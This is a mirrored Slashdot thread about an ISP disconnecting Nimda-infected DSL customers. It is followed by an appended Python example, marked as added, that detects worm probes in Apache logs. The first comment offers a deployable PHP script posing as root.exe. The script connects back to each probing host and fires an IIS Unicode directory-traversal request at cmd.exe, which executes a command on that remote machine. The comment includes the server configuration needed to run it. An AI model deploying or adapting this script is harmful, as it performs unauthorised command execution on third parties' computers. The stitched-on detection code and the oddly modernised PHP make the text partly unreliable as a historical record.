Slashdot Mirror


Shutting Down Worm-Infected Broadband Users

disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.

2 of 594 comments

  1. My Script to warn infected users by tommyServ0 · Score: 4, Informative

    I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"

    <?php
    /* Modern PHP has no register_globals, so request data comes from $_SERVER */
    $offender = $_SERVER['REMOTE_ADDR'];

    /* Open a connection to the offender */
    $fp = fsockopen($offender, 80, $errno, $errstr, 5);
    /* Check to see if the connection actually opened */
    if ($fp)
    {
        /* URL-encode the message... */
        $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
        /* ...and send it */
        fputs($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+$string HTTP/1.0\n\n");
        /* close the connection (though it probably got closed automatically) */
        fclose($fp);
    }

    /* for fun and confusion.. answer the worm with a fake Apache 404 page */
    header("HTTP/1.0 404 Not Found");

    echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n";
    echo "<html><head>\n<title>404 Not Found</title>\n</head><body>\n";
    echo "<h1>Not Found</h1>\n";
    echo "The requested URL {$_SERVER['SCRIPT_NAME']} was not found on this server.\n";
    echo "<address>Apache/1.3.20 Server at {$_SERVER['SERVER_NAME']} Port {$_SERVER['SERVER_PORT']}</address>\n";
    echo "</body></html>\n";

    /* log the offender's address and the time of the hit */
    $res = "dirty\r\n";
    $log = fopen("/tmp/nimda.log", "a");
    fwrite($log, $offender . " " . date("D, d M Y H:i:s T") . " - " . $res);
    fclose($log);
    ?>

    Then, after making sure users can access the file, try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?

    Well, here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put this type in, like this:

    AddType application/x-httpd-php .php .php3 .exe

    Now restart Apache by issuing either:
    /etc/rc.d/init.d/httpd restart
    apachectl restart

    That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimda.log.

    --

    Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.
  2. Re:Why? by mjh · Score: 4, Informative
    They care because the traffic generated by infected systems can be costly in both cash value and time. Not to mention the fact that there could be liability issues if they knew of infected systems but did nothing about it.

    Besides, if there are 3 vulnerable systems on a network, and 1 infected system, the responsible thing to do is to protect the 3 remaining uninfected systems.

    I don't believe that is the reason why the provider shut down their customers. I believe the reason is that they have very specific expectations of bandwidth usage. And they use these expectations to create a nice little equation: for X broadband users we need to have f(X) available bandwidth from our service provider, where f(X) is significantly lower than sum(all users' subscription rates). So while they guarantee you 7x24 access (at whatever rate you paid for) they're only expecting you to be a user 1-2 hours a day, maybe 3-4 days a week. The virii turn your computer bandwidth usage into 7x24 at your subscribed rate. And this really screws up their equation. This is one of the reasons that several broadband providers don't allow you to have servers on your network. The usage patterns of your web server or email server are too unpredictable, and consequently they have to set a policy that forbids them.

    If they don't know about, or stop, the virii, they end up with bad trending data. The trending data is what they use to determine whether or not f(X) was reasonable. When the trending data changes, so does f(X), and they have to spend more money believing that they need more bandwidth. Failure to do this results in customers switching to another provider. This is *especially* true of DSL customers for whom other providers are nearly guaranteed to exist (since DSL has open access). So, when a provider knows that the trending data is bad, they have one of two choices:

    1. Fix the problem causing the bad trending data - i.e. turn off users who are infected. Hopefully, they will use good identification techniques to determine which users are actually infected. I wouldn't be surprised to see some providers who simply turn off any user who has used more than the expected bandwidth assuming that it must mean that they are infected.
    2. Try and explain to their management why the trending data is bad, and why its conclusions should be ignored. This of course has the added disadvantage that even though the data is bad, customers are still experiencing denial of service.

    I guess I find myself agreeing with Taco, but only to a limited extent. The providers have to make at least some concession to the users who need to be able to download patches. It's easy for us in the *nix world to raise our noses at this. But don't forget that the very first Internet denial of service worm exploited sendmail. We're not immune. We're just not popular. And when the day comes that we are popular, I would like to think that there is a way for me to get the code that will resolve a problem that I didn't know I had.

    --
    Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
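A defender-side way to do the "good identification" mjh asks for in point 1, using the same worm probe requests (root.exe and the cmd.exe traversal URLs) that tommyServ0's trap page catches, and contrasting it with the bandwidth-only cutoff he worries about. This is an added example, not code from either poster or from DSL.net; the log lines are constructed, and the min_probes and byte_threshold values are assumptions.

```python
import re
from collections import Counter, defaultdict

# Apache common/combined log line: client IP, request line, status, bytes sent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)
# A non-IIS server never legitimately serves root.exe or cmd.exe; any request for
# them (directly, or via the ..%c0%af.. style traversals) came from an infected box.
PROBE_RE = re.compile(r'/(root|cmd)\.exe(\?|$)', re.IGNORECASE)

def parse_line(line):
    """Return (ip, path, bytes_sent) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    sent = 0 if m["bytes"] == "-" else int(m["bytes"])
    return m["ip"], m["path"], sent

def is_nimda_probe(path):
    return PROBE_RE.search(path) is not None

def infected_sources(lines, min_probes=2):
    """Signature-based: IPs that sent at least min_probes worm-style requests."""
    probes = Counter()
    for rec in map(parse_line, lines):
        if rec and is_nimda_probe(rec[1]):
            probes[rec[0]] += 1
    return {ip: n for ip, n in probes.items() if n >= min_probes}

def heavy_sources(lines, byte_threshold):
    """Bandwidth-only heuristic the thread warns about: IPs over a byte budget."""
    totals = defaultdict(int)
    for rec in map(parse_line, lines):
        if rec:
            totals[rec[0]] += rec[2]
    return {ip for ip, b in totals.items() if b > byte_threshold}

# Constructed sample: 10.0.0.5 scans like Nimda; 10.0.0.9 only fetches one large file.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Sep/2001:10:21:07 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287',
    '10.0.0.5 - - [18/Sep/2001:10:21:08 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287',
    '10.0.0.5 - - [18/Sep/2001:10:21:09 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287',
    '10.0.0.9 - - [18/Sep/2001:10:22:00 -0400] "GET /iso/freebsd-4.4-mini.iso HTTP/1.0" 200 209715200',
    '10.0.0.7 - - [18/Sep/2001:10:23:11 -0400] "GET /index.html HTTP/1.0" 200 1043',
]
```

Run over the sample, the signature check flags only 10.0.0.5, while a plain byte budget of 1 MB flags the harmless downloader 10.0.0.9 instead.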